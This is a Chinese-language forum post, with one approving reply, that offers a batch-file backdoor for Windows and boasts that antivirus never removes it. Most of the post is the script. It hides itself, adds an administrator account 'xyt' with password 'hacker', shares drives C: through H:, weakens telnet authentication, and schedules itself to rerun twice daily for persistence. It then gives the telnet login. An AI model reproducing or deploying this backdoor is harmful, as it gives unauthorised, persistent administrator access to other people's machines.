服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 4692|回复: 1

批处理写的后门 永不被杀

[复制链接]
dirtysea 发表于 2007-6-27 19:56:17 | 显示全部楼层 |阅读模式
这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
  @echo off
  @attrib +s + r xyt.bat
  @net user xyt hacker /add
  @net localgroup administrators xyt /add
  @net share c$=c:
  @net share d$=d:
  @net share e$=e:
  @net share f$=f:
  @net share g$=g:
  @net share h$=h:
  @tlntadmn config sec = -ntlm

  @net stop schedule
  @net start Schedule
  @echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
  @echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
  @at 11:05 c:\WINNT\SYSTEM32\xyt.bat
  @at 23:05 c:\WINNT\SYSTEM32\xyt.bat
  @net stop telnet
  @net start telnet
  @exit

  这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
  运行后TELNET IP上去,用户名为xyt,密码为hacker。
玄月月 发表于 2006-5-31 16:23:34 | 显示全部楼层

re:批处理写的后门 永不被杀

呵呵,说得有道理......

 

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-29 06:34 , Processed in 0.160947 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表